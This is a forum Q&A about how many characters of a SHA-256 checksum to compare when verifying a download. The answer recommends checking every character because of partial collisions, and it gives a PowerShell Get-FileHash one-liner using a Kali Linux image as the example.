Checksums are useful for verifying that a file, such as a downloaded dmg, has not been changed. But it's tedious to examine the entire checksum, since a SHA-256 checksum has 64 hex characters. Fortunately, the algorithm is designed such that two files with a small difference in content will have very different checksums.
Still, I want to be sure, so just how many characters do I need to compare to safely verify that two files are identical? Is it sufficient to compare, say, the first or last 5 characters?
Quick
You should check every character. You shouldn't check it on your own. For Windows/Powershell use this:
get-filehash ./relativeLocationOfFileToCompare | select -expandproperty hash | compare-object theHashYouWantToCompare
i.e.
get-filehash ./kali-linux-2020.4-vbox-i386.ova | select -expandproperty hash | compare-object 64f6ca69ccb3efc79e350977d33109c380a744c26158c4e3956141535242e2ca
More
You need to check every character, for malicious parties can create partial collisions i.e. the first 20 characters are the same.
My understanding of why checksums are used
You want software. You go to the actual supplier website i.e. kali.org. You click to download software. Kali.org doesn't actually send you the software; they tell your browser to go to their cdn and download the software. The cdn is a slightly un-trusted third party. The cdn could've gone rogue, or the cdn could be compromised. What to do.
Kali.org is not compromised (if kali is, there are bigger issues and checksumming isn't used to combat them). Therefore, you can obtain the valid checksum from Kali.org. You get the hash and compare every character with the one-liner I provided. You've protected yourself from non-collisions, part-collisions, and you've probably saved some time by not comparing each character manually.